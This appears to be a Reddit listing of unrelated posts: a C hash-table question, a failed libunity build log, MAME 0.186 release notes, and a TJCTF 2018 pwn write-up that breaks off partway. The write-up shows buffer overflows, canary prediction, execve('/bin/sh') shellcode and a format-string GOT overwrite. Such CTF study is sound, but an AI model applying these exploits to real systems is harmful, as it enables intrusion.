submitted by Vortax_Wyvern to qnap

Hash Table for Embedded Systems?

Hi all,
I have a CSV file of about 1500 elements that maps a long integer (uint32_t) to a 128-char ASCII binary string. When I want to access one of these strings, I use a fairly simple lookup strategy that returns this bitstring in a char array, which I then convert to a series of hex values for storage in a struct.
This is incredibly inefficient and does too much disk access. Ideally, I'd want a hash table implementation with all the normal functions, plus an option to reload from a predefined location on disk, with the added constraint that it be optimized for an embedded system (64 KiB RAM allotted, 1 GHz CPU; though this is a really low-priority task, e.g. maximum NICE level).
Here's a partial C implementation of the current lookup method that compiles under -Werror, -Wall, -Wpedantic:
// reading a text file
#include <stdio.h>     /* printf, snprintf, fopen, getline */
#include <stdlib.h>    /* exit, EXIT_FAILURE */
#include <string.h>    /* strlen, strncpy, strtok, strcmp, memset */
#include <assert.h>
#include <inttypes.h>  /* PRIu32 */
#include <stdint.h>    /* uint32_t */

#define MAX_LINE_LENGTH 100
#define NUM_BITS_PER_CMD 96

//give 2 pointers and mode as input
void print_bitstring(char *p)
{
    for (int i = 0; i < strlen(p); i++) {
        if (i % 4 == 0 && i)
            printf(" ");
        if (i % 8 == 0 && i)
            printf("\n");
        printf("%c", p[i]);
    }
}

void expander(uint32_t mode, char *f_b, char *s_b)
{
    /* zero both output buffers (they arrive uninitialized from main) */
    memset((unsigned char *)f_b, 0, NUM_BITS_PER_CMD + 1);
    memset((unsigned char *)s_b, 0, NUM_BITS_PER_CMD + 1);
    char temp1[MAX_LINE_LENGTH], temp2[2*MAX_LINE_LENGTH];

    // Converting incoming mode to a string
    // reference: https://stackoverflow.com/questions/2709713/how-to-convert-unsigned-long-to-string
    // u32_t format specifier found here: https://stackoverflow.com/questions/3168275/printf-format-specifiers-for-uint32-t-and-size-t
    const int n = snprintf(NULL, 0, "%"PRIu32"", mode);
    assert(n > 0);
    char input[n+1];
    int c = snprintf(input, n+1, "%"PRIu32"", mode);
    assert(input[n] == '\0');
    assert(c == n);

    char command[MAX_LINE_LENGTH], mode_id[MAX_LINE_LENGTH], *pt, *line = NULL;
    FILE *fp;
    size_t len = 0;
    ssize_t read;

    fp = fopen("./lookupTable.csv", "r");
    if (fp != NULL) {
        // Reading in lookup table line by line
        // reference: https://stackoverflow.com/questions/3501338/c-read-file-line-by-line
        while ((read = getline(&line, &len, fp)) != -1) {
            line[read - 1] = '\0';
            char delimiter[] = ",";
            //size_t pos = 0;
            //mode_id = "";
            // Read tokens from CSV file
            // reference: http://www.cplusplus.com/reference/cstring/strtok/
            pt = strtok(line, delimiter);
            if (pt != NULL) {
                // Filling mode_id
                // reference: http://man7.org/linux/man-pages/man3/strcpy.3.html
                // I considered strlcpy, but strdup should work fine for our purposes.
                // mode_id = strdup(pt);
                strncpy(mode_id, pt, sizeof(mode_id));
#if(DEBUG)
                //printf("mode_id is %d bytes long.\n", strlen(mode_id));
#endif
                assert(mode_id != NULL);
                // strlcpy(mode_id, pt, MAX_LINE_LENGTH);
                pt = strtok(NULL, delimiter);
            } else {
#if(DEBUG)
                printf("No comma found when parsing CSV! Exiting...\n");
#endif
                exit(EXIT_FAILURE);
            }
            if (pt != NULL) {
                strncpy(command, pt, sizeof(command));
                //command = strdup(pt);
                assert(command != NULL);
            } else {
#if(DEBUG)
                printf("No comma found when parsing CSV! Exiting...\n");
#endif
                exit(EXIT_FAILURE);
            }
            if (strcmp(input, mode_id) == 0) {
#if(DEBUG)
                printf("Found a matching mode_id!\n");
#endif
                if (strlen(command) == NUM_BITS_PER_CMD) {
                    strncpy(temp1, command, NUM_BITS_PER_CMD + 1);
#if(DEBUG)
                    printf("Copying command into f_b and s_b...\n");
#endif
                    for (int i = 0; i < strlen(temp1); i++) {
                        f_b[i] = temp1[i];
                        s_b[i] = temp1[i];
                    }
                } else {
                    printf("Command was longer than %d bits. Detected length: %zu\n",
                           NUM_BITS_PER_CMD, strlen(command));
                    printf("Command string:\n");
                    print_bitstring(command);
                    strncpy(temp2, command, NUM_BITS_PER_CMD + 1);
                    int j = 0;
                    for (int i = 0; i < strlen(temp2); i++) {
#if(DEBUG)
                        if (i == 0)
                            printf("Copying first %d bits into f_b\n", NUM_BITS_PER_CMD);
                        if (i == NUM_BITS_PER_CMD)
                            printf("Copying remaining %zu bits into s_b\n", strlen(temp2) - NUM_BITS_PER_CMD);
#endif
                        if (i < NUM_BITS_PER_CMD) {
                            // Straightforward copy, maybe could just use strncpy?
                            f_b[i] = temp2[i];
                        } else {
                            // Overflows excess command bits into s_b
                            s_b[j] = temp2[i];
                            j++;
                        }
                    }
#if(DEBUG)
                    if (j > 0)
                        printf("Buffer contained %d extra bytes, copied into s_b\n", j);
#endif
                }
            }
        }
        fclose(fp);
    } else {
#if(DEBUG)
        printf("Unable to open file\n");
#endif
        exit(EXIT_FAILURE);
    }
}

int main(void)
{
    uint32_t mode = 1118074860; //32 bit mode ID
    // Corresponding shell command: grep 1118 lookupTable.csv | sed 's/.*,//' | sed -e "s/.\{8\}/&\n/g"
    char f_b[NUM_BITS_PER_CMD + 1], s_b[NUM_BITS_PER_CMD + 1]; //constant buffers to LIIB
    f_b[NUM_BITS_PER_CMD] = '\0';
    s_b[NUM_BITS_PER_CMD] = '\0';
    expander(mode, f_b, s_b);
    printf("Looping over first word (length: %zu)...\n", strlen(f_b));
    print_bitstring(f_b);
    printf("\n");
    printf("Looping over second word (length: %zu)...\n", strlen(s_b));
    print_bitstring(s_b);
    return 0;
}
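In case it clarifies the shape I'm after, here is the rough direction I'm picturing (a sketch only; the names, sizes and hash mix are invented, and it is untested): a fixed-size open-addressing table keyed on the uint32_t mode, filled once from the CSV at startup so later lookups never touch the disk. Two honest caveats: 1500 entries of ~100 bytes outgrow 64 KiB of RAM on their own, so the value storage would likely have to live in flash, and I'm assuming a mode of 0 never occurs, since I use it as the empty-slot marker.

#include <stdint.h>
#include <string.h>

#define TABLE_SIZE 2048u          /* power of two, > 1500 entries */
#define CMD_LEN    96

struct entry {
    uint32_t mode;                /* key; 0 marks an empty slot (assumption!) */
    char     cmd[CMD_LEN + 1];    /* value; ~200 KiB total, likely flash-resident */
};

static struct entry table[TABLE_SIZE];

static uint32_t hash_u32(uint32_t x) /* cheap integer mixing function */
{
    x ^= x >> 16;
    x *= 0x45d9f3bu;
    x ^= x >> 16;
    return x;
}

/* Insert (or overwrite) one CSV row; returns 0 on success, -1 if full. */
int table_put(uint32_t mode, const char *cmd)
{
    for (uint32_t i = 0; i < TABLE_SIZE; i++) {
        uint32_t slot = (hash_u32(mode) + i) & (TABLE_SIZE - 1u); /* linear probing */
        if (table[slot].mode == 0u || table[slot].mode == mode) {
            table[slot].mode = mode;
            strncpy(table[slot].cmd, cmd, CMD_LEN);
            table[slot].cmd[CMD_LEN] = '\0';
            return 0;
        }
    }
    return -1;
}

/* Lookup; returns NULL when the mode is absent. */
const char *table_get(uint32_t mode)
{
    for (uint32_t i = 0; i < TABLE_SIZE; i++) {
        uint32_t slot = (hash_u32(mode) + i) & (TABLE_SIZE - 1u);
        if (table[slot].mode == mode)
            return table[slot].cmd;
        if (table[slot].mode == 0u)  /* empty slot reached: key not present */
            return NULL;
    }
    return NULL;
}

Reloading from disk would then just be "zero the table and re-run the CSV parse through table_put", and expander() would collapse to one table_get call plus the split into f_b/s_b.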
submitted by t40 to C_Programming

Cannot install libunity via AUR using pacman

Whenever I try to install libunity from the AUR I get the following output, even though I have all dependencies installed:

Preparing...
Cloning libunity build files...
Checking libunity dependencies...
Building libunity...
==> Making package: libunity 7.1.4-8 (Thu 13 Jun 2019 11:52:26 PM EEST)
==> Checking runtime dependencies...
==> Checking buildtime dependencies...
==> Retrieving sources...
-> Found libunity_7.1.4+19.04.20190319.orig.tar.gz
==> Validating source files with sha256sums...
libunity_7.1.4+19.04.20190319.orig.tar.gz ... Passed
==> Removing existing $srcdir/ directory...
==> Extracting sources...
-> Extracting libunity_7.1.4+19.04.20190319.orig.tar.gz with bsdtar
==> Starting prepare()...
/usr/bin/gnome-autogen.sh
***Warning*** USE_GNOME2_MACROS is deprecated, you may remove it from autogen.sh
***Warning*** PKG_NAME is deprecated, you may remove it from autogen.sh
checking for automake >= 1.11.2...
testing automake... found 1.16.1
checking for autoreconf >= 2.53...
testing autoreconf... found 2.69
checking for intltool >= 0.25...
testing intltoolize... found 0.51.0
checking for pkg-config >= 0.14.0...
testing pkg-config... found 1.6.1
Checking for required M4 macros...
Processing ./configure.ac
Running intltoolize...
Running autoreconf...
autoreconf: Entering directory `.'
autoreconf: configure.ac: not using Gettext
autoreconf: running: aclocal --force --warnings=no-portability
autoreconf: configure.ac: tracing
autoreconf: running: libtoolize --copy --force
libtoolize: putting auxiliary files in '.'.
libtoolize: copying file './ltmain.sh'
libtoolize: putting macros in AC_CONFIG_MACRO_DIRS, 'm4'.
libtoolize: copying file 'm4/libtool.m4'
libtoolize: copying file 'm4/ltoptions.m4'
libtoolize: copying file 'm4/ltsugar.m4'
libtoolize: copying file 'm4/ltversion.m4'
libtoolize: copying file 'm4/lt~obsolete.m4'
libtoolize: Consider adding '-I m4' to ACLOCAL_AMFLAGS in Makefile.am.
autoreconf: running: /usr/bin/autoconf --force --warnings=no-portability
autoreconf: running: /usr/bin/autoheader --force --warnings=no-portability
autoreconf: running: automake --add-missing --copy --force-missing --warnings=no-portability
configure.ac:4: warning: AM_INIT_AUTOMAKE: two- and three-arguments forms are deprecated. For more info, see:
configure.ac:4: https://www.gnu.org/software/automake/manual/automake.html#Modernize-AM_005fINIT_005fAUTOMAKE-invocation
configure.ac:61: installing './compile'
configure.ac:65: installing './config.guess'
configure.ac:65: installing './config.sub'
configure.ac:4: installing './install-sh'
configure.ac:4: installing './missing'
bindings/python/Makefile.am:4: installing './py-compile'
examples/Makefile.am: installing './depcomp'
parallel-tests: installing './test-driver'
autoreconf: Leaving directory `.'
Skipping configure process.
==> Removing existing $pkgdir/ directory...
==> Starting build()...
checking for a BSD-compatible install... /usr/bin/install -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... /usr/bin/mkdir -p
checking for gawk... gawk
checking whether make sets $(MAKE)... yes
checking whether make supports nested variables... yes
checking whether to enable maintainer-specific portions of Makefiles... no
checking whether make supports nested variables... (cached) yes
checking whether make supports the include directive... yes (GNU style)
checking for gcc... gcc
checking whether the C compiler works... yes
checking for C compiler default output file name... a.out
checking for suffix of executables...
checking whether we are cross compiling... no
checking for suffix of object files... o
checking whether we are using the GNU C compiler... yes
checking whether gcc accepts -g... yes
checking for gcc option to accept ISO C89... none needed
checking whether gcc understands -c and -o together... yes
checking dependency style of gcc... gcc3
checking for library containing strerror... none required
checking for gcc... (cached) gcc
checking whether we are using the GNU C compiler... (cached) yes
checking whether gcc accepts -g... (cached) yes
checking for gcc option to accept ISO C89... (cached) none needed
checking whether gcc understands -c and -o together... (cached) yes
checking dependency style of gcc... (cached) gcc3
checking for gcc... (cached) gcc
checking whether we are using the GNU C compiler... (cached) yes
checking whether gcc accepts -g... (cached) yes
checking for gcc option to accept ISO C89... (cached) none needed
checking whether gcc understands -c and -o together... (cached) yes
checking dependency style of gcc... (cached) gcc3
checking how to run the C preprocessor... gcc -E
checking for grep that handles long lines and -e... /usr/bin/grep
checking for egrep... /usr/bin/grep -E
checking for ANSI C header files... yes
checking build system type... x86_64-pc-linux-gnu
checking host system type... x86_64-pc-linux-gnu
checking how to print strings... printf
checking for a sed that does not truncate output... /usr/bin/sed
checking for fgrep... /usr/bin/grep -F
checking for ld used by gcc... /usr/bin/ld
checking if the linker (/usr/bin/ld) is GNU ld... yes
checking for BSD- or MS-compatible name lister (nm)... /usr/bin/nm -B
checking the name lister (/usr/bin/nm -B) interface... BSD nm
checking whether ln -s works... yes
checking the maximum length of command line arguments... 1572864
checking how to convert x86_64-pc-linux-gnu file names to x86_64-pc-linux-gnu format... func_convert_file_noop
checking how to convert x86_64-pc-linux-gnu file names to toolchain format... func_convert_file_noop
checking for /usr/bin/ld option to reload object files... -r
checking for objdump... objdump
checking how to recognize dependent libraries... pass_all
checking for dlltool... no
checking how to associate runtime and link libraries... printf %s\n
checking for ar... ar
checking for archiver @FILE support... @
checking for strip... strip
checking for ranlib... ranlib
checking command to parse /usr/bin/nm -B output from gcc object... ok
checking for sysroot... no
checking for a working dd... /usr/bin/dd
checking how to truncate binary pipes... /usr/bin/dd bs=4096 count=1
checking for mt... no
checking if : is a manifest tool... no
checking for sys/types.h... yes
checking for sys/stat.h... yes
checking for stdlib.h... yes
checking for string.h... yes
checking for memory.h... yes
checking for strings.h... yes
checking for inttypes.h... yes
checking for stdint.h... yes
checking for unistd.h... yes
checking for dlfcn.h... yes
checking for objdir... .libs
checking if gcc supports -fno-rtti -fno-exceptions... no
checking for gcc option to produce PIC... -fPIC -DPIC
checking if gcc PIC flag -fPIC -DPIC works... yes
checking if gcc static flag -static works... yes
checking if gcc supports -c -o file.o... yes
checking if gcc supports -c -o file.o... (cached) yes
checking whether the gcc linker (/usr/bin/ld -m elf_x86_64) supports shared libraries... yes
checking whether -lc should be explicitly linked in... no
checking dynamic linker characteristics... GNU/Linux ld.so
checking how to hardcode library paths into programs... immediate
checking whether stripping libraries is possible... yes
checking if libtool supports shared libraries... yes
checking whether to build shared libraries... yes
checking whether to build static libraries... no
checking for valac... /usr/bin/valac
checking whether /usr/bin/valac is at least version 0.31.1... yes
checking for python... /usr/bin/python
checking for python version... 3.7
checking for python platform... linux
checking for python script directory... ${prefix}/lib/python3.7/site-packages
checking for python extension module directory... ${exec_prefix}/lib/python3.7/site-packages
checking for pygobject overrides directory... /usr/lib/python3.7/site-packages/gi/overrides
checking for gobject-introspection m4 macros... yes
checking for pkg-config... /usr/bin/pkg-config
checking pkg-config is at least version 0.9.0... yes
checking for gobject-introspection... yes
checking whether NLS is requested... yes
checking for intltool >= 0.40.0... 0.51.0 found
checking for intltool-update... /usr/bin/intltool-update
checking for intltool-merge... /usr/bin/intltool-merge
checking for intltool-extract... /usr/bin/intltool-extract
checking for xgettext... /usr/bin/xgettext
checking for msgmerge... /usr/bin/msgmerge
checking for msgfmt... /usr/bin/msgfmt
checking for gmsgfmt... /usr/bin/msgfmt
checking for perl... /usr/bin/perl
checking for perl >= 5.8.1... 5.28.2
checking for XML::Parser... ok
checking for xvfb-run... no
checking for dbus-run-session... /usr/bin/dbus-run-session
checking for GLIB2... yes
checking for GOBJECT2... yes
checking for GIO2... yes
checking for GIO_UNIX2... yes
checking for DEE... yes
checking for DBUSMENU... yes
checking for GTK3... yes
checking for GMODULE... yes
checking for LTTNG... no
checking for glib-compile-resources... /usr/bin/glib-compile-resources
checking for glib-mkenums... /usr/bin/glib-mkenums
checking for glib-genmarshal... /usr/bin/glib-genmarshal
checking for pkg-config... (cached) /usr/bin/pkg-config
checking pkg-config is at least version 0.16... yes
checking that generated files are newer than configure... done
configure: creating ./config.status
config.status: creating unity.pc
config.status: creating unity-protocol-private.pc
config.status: creating unity-extras.pc
config.status: creating Makefile
config.status: creating bindings/Makefile
config.status: creating bindings/python/Makefile
config.status: creating data/com.canonical.Unity.Lenses.gschema.xml.in
config.status: creating data/Makefile
config.status: creating doc/Makefile
config.status: creating doc/reference/Makefile
config.status: creating examples/Makefile
config.status: creating po/Makefile.in
config.status: creating protocol/Makefile
config.status: creating src/Makefile
config.status: creating extras/Makefile
config.status: creating loader/Makefile
config.status: creating tools/Makefile
config.status: creating test/Makefile
config.status: creating test/C/Makefile
config.status: creating test/vala/Makefile
config.status: creating test/python/Makefile
config.status: creating vapi/Makefile
config.status: creating config.h
config.status: executing depfiles commands
config.status: executing libtool commands
config.status: executing po/stamp-it commands
configure:

libunity v7.1.4 (soname 9:2:0)
(protocol soname 0:0:0)
------------------------------

Build environment
Prefix : /usr
Build GI typelib : yes
Documentation : no
C warnings : no
Trace logging : no
LTTNG tracepoints : no

Testing
Integration tests : no
Headless tests : yes
Coverage reporting : no

make all-recursive
make[1]: Entering directory '/home/omarabu-amara/pamac-build/libunity/src'
Making all in data
make[2]: Entering directory '/home/omarabu-amara/pamac-build/libunity/src/data'
ITMRG com.canonical.Unity.Lenses.gschema.xml
GEN com.canonical.Unity.Lenses.gschema.valid
make[2]: Leaving directory '/home/omarabu-amara/pamac-build/libunity/src/data'
Making all in protocol
make[2]: Entering directory '/home/omarabu-amara/pamac-build/libunity/src/protocol'
GEN libunity_protocol_private_la_vala.stamp
protocol-scope-discovery.vala:24.3-24.40: warning: the modifier `static' is not applicable to constants
private static const string SCOPES_DIR = "unity/scopes";
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
protocol-scope-discovery.vala:190.5-190.43: warning: the modifier `static' is not applicable to constants
private static const string SCOPE_GROUP = "Scope";
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
protocol-scope-discovery.vala:191.5-191.45: warning: the modifier `static' is not applicable to constants
private static const string DESKTOP_GROUP = "Desktop Entry";
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
protocol-scope-discovery.vala:902.5-902.49: warning: the modifier `static' is not applicable to constants
private static const string SCOPE_GROUP_GROUP = "Scope Group";
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
protocol-preview-player.vala:41.3-41.46: warning: the modifier `static' is not applicable to constants
static const string PREVIEW_PLAYER_DBUS_NAME = "com.canonical.Unity.Lens.Music.PreviewPlayer";
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
protocol-preview-player.vala:42.3-42.46: warning: the modifier `static' is not applicable to constants
static const string PREVIEW_PLAYER_DBUS_PATH = "/com/canonical/Unity/Lens/Music/PreviewPlayer";
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
dee-1.0.vapi:44.35-44.44: error: construct properties not supported for specified property type
 public Dee.Filter filter { get; construct; } 
^^^^^^^^^^
dee-1.0.vapi:76.35-76.44: error: construct properties not supported for specified property type
 public Dee.ModelReader reader { construct; } 
^^^^^^^^^^
protocol-scope-interface.vala:117.3-117.51: warning: DBus methods are recommended to throw at least `GLib.Error' or `GLib.DBusError, GLib.IOError'
public abstract async ActivationReplyRaw activate (
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
protocol-scope-interface.vala:124.3-124.57: warning: DBus methods are recommended to throw at least `GLib.Error' or `GLib.DBusError, GLib.IOError'
public abstract async HashTable search (
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
protocol-scope-interface.vala:130.3-130.43: warning: DBus methods are recommended to throw at least `GLib.Error' or `GLib.DBusError, GLib.IOError'
public abstract async string open_channel (
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
protocol-scope-interface.vala:137.3-137.42: warning: DBus methods are recommended to throw at least `GLib.Error' or `GLib.DBusError, GLib.IOError'
public abstract async void close_channel (
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
protocol-scope-interface.vala:142.3-142.63: warning: DBus methods are recommended to throw at least `GLib.Error' or `GLib.DBusError, GLib.IOError'
public abstract async HashTable push_results (
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
protocol-scope-interface.vala:151.3-151.42: warning: DBus methods are recommended to throw at least `GLib.Error' or `GLib.DBusError, GLib.IOError'
public abstract async void set_view_type (uint view_type) throws IOError;
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Command-line option `--thread` is deprecated and will be ignored
Compilation failed: 2 error(s), 12 warning(s)
make[2]: *** [Makefile:957: libunity_protocol_private_la_vala.stamp] Error 1
make[2]: Leaving directory '/home/omarabu-amara/pamac-build/libunity/src/protocol'
make[1]: *** [Makefile:571: all-recursive] Error 1
make[1]: Leaving directory '/home/omarabu-amara/pamac-build/libunity/src'
make: *** [Makefile:475: all] Error 2
==> ERROR: A failure occurred in build().
Aborting...
submitted by ogaa123 to ManjaroLinux [link] [comments]

MAME 0.186 has been released!

MAME 0.186

It’s been one of those long, five-week development cycles, but it’s finally time for your monthly MAME fix. There’s been a lot touched in this release, with improvements in a number of areas. But before we get to the improvements, we have an embarrassing admission to make: the game added in 0.185 as Acchi Muite Hoi is actually Pata Pata Panic, and the sound ROM mapping was incorrect, making the game unplayable. That’s all sorted out now though, thanks to occasional contributor k2.
New working arcade games include Epos Revenger ’84, Jockey Club II, Hashire Patrol Car, the Mega Play version of Gunstar Heroes, and the much-awaited Taito Classic Space Cyclone. Improvements to emulation make Legionnaire and Heated Barrel fully playable at long last, and Megatouch XL 6000 is working in this release. There are also plenty of new versions of supported games, including a world release of the puzzle game Star Sweep, the Taito licensed version of Bagman, the Japanese release of Top Landing, the Italian release of Penky, and European bootlegs of Amidar and Phoenix. We’ve got some exciting improvements to supported arcade games this month, too. Sound effects for Universal’s Cheeky Mouse are now supported, and the analog section of the melody synthesiser used in Zaccaria’s Jack Rabbit and Money Money has been implemented, although it’s still missing the cassa (bass drum) sound at the moment. We need schematics and quality PCB photos to add support for analog sound synthesis in more games, so if you find any we’d really appreciate if you could send them our way.
New working home/handheld games include Jungle Soft Zone 60, Gradius, Lone Ranger, Teenage Mutant Ninja Turtles, Top Gun, and the Game & Watch titles Mario’s Cement Factory, Boxing, Donkey Kong II and Mickey & Donald. The CoCo Games Master Cartridge is supported as a CoCo slot device, support for the French Minitel 2 terminal has been added (thanks to Jean-François Del Nero), and there’s some more progress on the InterPro systems from Patrick Mackinlay. Peripherals for the TI-99 home computer family have been overhauled, making the PEB a slot device that plugs into the I/O port – this will require changes to your configuration if you use this family of computers.
Finally, the -listroms verb supports device sets (e.g. mpu401 or m68705p3), -listroms, -verifyroms and -listxml support multiple patterns on the command line, -verifyroms is much faster when a small number of sets are specified, and the romcmp tool has seen several improvements.
Get the source/Windows binaries from the download page and enjoy all the improvements. Thanks for continuing to use and support the one and only MAME.

submitted by cuavas to emulation [link] [comments]

TJCTF 2018 - Binary Exploitation Guide

Hello, I am pretty new here and I just created a full guide for all the pwn challenges from TJCTF.
I hope you'll enjoy it; here is the original link on Medium: https://medium.com/@mihailferaru2000/tjctf-2018-full-binary-exploitation-walk-through-a72a9870564e

Math Whiz

We have a simple binary that will show us the flag if we can become admin.
if (admin) {
    printf("Successfully registered '%s' as an administrator account!\n", username);
    printf("Here is your flag: %s\n", FLAG);
} else {
    printf("Successfully registered '%s' as an user account!\n", username);
}
But the admin variable is not set anywhere, so we need to pwn it. It will be pretty easy, as we have the source code provided. If we take a look at the input function, we observe that it reads the specified size multiplied by 16. The most obvious buffer overflow is where the PIN code gets read:
input(recoverypin, 4); 
This means that we read 64 bytes into a 4-byte array. We also see that the admin variable is declared before the buffers, so the question is how we can override it. Lucky for us, modern compilers move buffers before any other variables to keep them away from the return pointer, but in our case, the layout works to our advantage. Finally, any input larger than 52 bytes will provide us this beauty: tjctf{d4n63r0u5_buff3r_0v3rfl0w5}
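To make the layout concrete, here is a sketch of the overflow in plain C. The struct, the 48 bytes of padding, and the field names are my guesses; only the 4-byte PIN buffer, the 64-byte read, and the 52-byte threshold come from the challenge source:

#include <stdio.h>
#include <string.h>

int main(void)
{
    /* hypothetical frame layout; only the distances are known */
    struct {
        char recoverypin[4];
        char padding[48];   /* other locals between the buffer and admin */
        int  admin;
    } frame = {{0}, {0}, 0};

    /* input(recoverypin, 4) really reads 4 * 16 = 64 bytes; any byte
     * past the 52nd lands on admin */
    char attack[64];
    memset(attack, 'A', sizeof attack);
    memcpy(&frame, attack, 53);             /* the 53rd byte reaches admin */

    printf("admin = 0x%x\n", frame.admin);  /* 0x41 -> nonzero -> admin! */
    return 0;
}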

Tilted Troop

We’ve got a binary that reads up to 8 team members with random strengths and simulates a battle with some fantastic creature. If the sum of the strengths reaches the goal (400 in this case), we get the flag. Again, we have the source code, so our life is a lot easier since we don’t have to disassemble anything. We see that the array of strengths is kept right after the array of names, so maybe we can override it somehow.
Checking how the bounds checks are done, we can spot a bug:
if(t.teamSize > MAX_TEAM_SIZE) 
Array indexing starts from 0, so from 0 to MAX_TEAM_SIZE there are MAX_TEAM_SIZE + 1 elements. We need to create 8 members in our team and then just override the strength variable.
for i in range(4):
    io.recvline()
for i in range(8):
    io.sendline('A test')
# this will override the strength buffer
# 'd' = 100 => 'd' * 4 = 400
io.sendline('A dddd')
io.sendline('F')
io.interactive()
And here it is: tjctf{0oPs_CoMP4Ri5ONs_r_h4rD}
Full solution: https://github.com/JustBeYou/ctfs/blob/master/tjctf2018/strover.py
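For reference, the bound-check bug can be reproduced in isolation. This is a sketch with assumed field names and sizes, not the challenge's actual struct:

#include <stdio.h>
#include <string.h>

#define MAX_TEAM_SIZE 8

struct team {
    char names[MAX_TEAM_SIZE][4];   /* assumed sizes */
    unsigned char strengths[4];     /* sits right after the names */
    int teamSize;
};

int main(void)
{
    struct team t = {{{0}}, {0}, MAX_TEAM_SIZE};  /* 8 members already added */

    if (t.teamSize > MAX_TEAM_SIZE)   /* buggy bound: should be >= */
        return 1;

    /* the "9th" name is written one slot past names[], onto strengths;
     * formally out of bounds, which is exactly the bug */
    memcpy(t.names[t.teamSize], "dddd", 4);

    int sum = 0;
    for (int i = 0; i < 4; i++)
        sum += t.strengths[i];
    printf("total strength = %d\n", sum);   /* 4 * 'd' (100) = 400 */
    return 0;
}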

Future Canary Lab

Again, we have to deal with variable overriding, but this time we have some kind of protection:
// canary generation
for (i = 0; i < 10; ++i) {
    canary[i] = check[i] = rand();
}
// ...
// canary check
for (j = 0; j < 10; ++j) {
    if (canary[j] != check[j]) {
        printf("Alas, it would appear you lack the time travel powers we desire.\n");
        exit(0);
    }
}
If you are familiar with stack canaries (or stack cookies), you will easily recognize that this is a handmade implementation. As rand() is not a secure function, we can reproduce its return values. In the main() function we see that it is seeded with the current time, so it is pretty vulnerable. Using the time at which we connect to the server as the seed, we can regenerate the values of the canary. Here is a little C program to generate 10 random values based on our seed:
int main(int argc, char **argv) {
    int seed = atoi(argv[1]);
    srand(seed);
    for (int i = 0; i <= 9; i++) {
        printf("%d\n", rand());
    }
    return 0;
}
Now, as we bypassed the canary, we need to satisfy the following condition:
if (secret - i + j == 0xdeadbeef) 
secret is always 0, i can be overridden by us, and j is always 10, so we need to set i to 0x2152411b to satisfy the equation.
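The value 0x2152411b falls out of 32-bit wraparound arithmetic; a quick sanity check:

#include <stdio.h>
#include <stdint.h>

int main(void)
{
    uint32_t j = 10, target = 0xdeadbeef;
    uint32_t i = j - target;                  /* wraps around mod 2^32 */
    printf("i     = 0x%08x\n", i);            /* 0x2152411b */
    printf("check = 0x%08x\n", 0u - i + j);   /* secret(0) - i + j = 0xdeadbeef */
    return 0;
}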
At the end we have: tjctf{3l_p5y_k0n6r00_0ur_n3w357_l4b_m3mb3r!}
Full solution: https://github.com/JustBeYou/ctfs/blob/master/tjctf2018/interview.py
We were given a small demo banking system. We have the source code, so the vulnerability will be pretty easy to spot. At first the program looks pretty secure, but if we take a look at the verify_pin() function we see a clear buffer overflow. Let's run checksec to see what protections this binary employs:
$ checksec problem
[*] '/home/littlewho/ctfs/tjctf2018/problem'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments
It has no stack canary and no execution prevention of any kind, so the solution is straightforward. The name array is global, so it is stored in the BSS section and we know its address: 0x6010A0. We can store our shellcode there and then use the overflow to jump to it.
; execve(["/bin/sh"], [], [])
bits 64
push 0x68
mov rax, 0x732f2f6e69622f2f
push rax
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx
xor r10, r10
mov rax, 0x3b
syscall
Compile it as a raw binary using nasm so it is easy to use. The layout of the attack vector is:
4 chars for PIN + 13 bytes to fill the buffer and the RBP + RIP 
Running the exploit
Flag: tjctf{d4n6_17_y0u_r0pp3d_m3_:(}
Full solution: https://github.com/JustBeYou/ctfs/blob/mastetjctf2018/problem.py

Secure Secrets

The challenges until now were pretty easy; the real fun starts here. Don't get scared, they are still easy, but they need a bit more work than the others, as we no longer have the source code and we need to do format string exploitation.
Running the application
This is how the application looks. It just reads a password and a message, then shows the message. Let's open the binary in IDA Pro (or Hopper). Both of them can generate pseudo-code for the program (press F5 in IDA, or search the top menu in Hopper), but for now let's analyze some assembly.
We don’t see any buffer overflow, but the following code from get_message() looks interesting:
.text:0804885D    mov  eax, [ebp+arg_0]
.text:08048860    mov  [ebp+var_2C], eax
...
.text:080488EC    push [ebp+var_2C]    ; format
.text:080488EF    call _printf
.text:080488F4    add  esp, 10h
var_2C is the argument passed to the function; it represents our message, and it is passed directly to printf(). That means: format string vulnerability! The scenario could be the classic one: leak libc, overwrite some function's GOT entry with system(), pass "/bin/sh" to it and get the flag. But it is even easier: after investigating the binary a little more, we see another function named get_secret() that has some pretty interesting code in it:
.text:08048727    push offset modes    ; "r"
.text:0804872C    push offset filename ; "flag.txt"
.text:08048731    call _fopen
So it is clear: we need to overwrite some GOT entry with the address of this function. I will choose puts(), as it is called a few times after our exploit runs. We need to write 0x08048713 (get_secret) at 0x0804A028 (puts@GOT) in order to get the flag. We will use 2 writes of 2 bytes each (if you are not familiar with this type of exploit, look up format string write primitives). Before we craft our exploit, we need to know where our controlled buffer is, in order to pop addresses from it. If we set a breakpoint before the printf at 0x080488EF and dump the stack, we will see that %35$x is our buffer.
Here is a short explanation for those who wonder how I got that number. Open the executable in GDB and put a breakpoint at that printf. Input something like AAAABBBB %x %x %x as the message and continue. When the breakpoint is hit, dump the stack, then step to the next instruction. The printf output will be something like:
AAAABBBB ffffc5ec f7fa05c0 fbad2887 
Now let’s search those values in the stack dump.
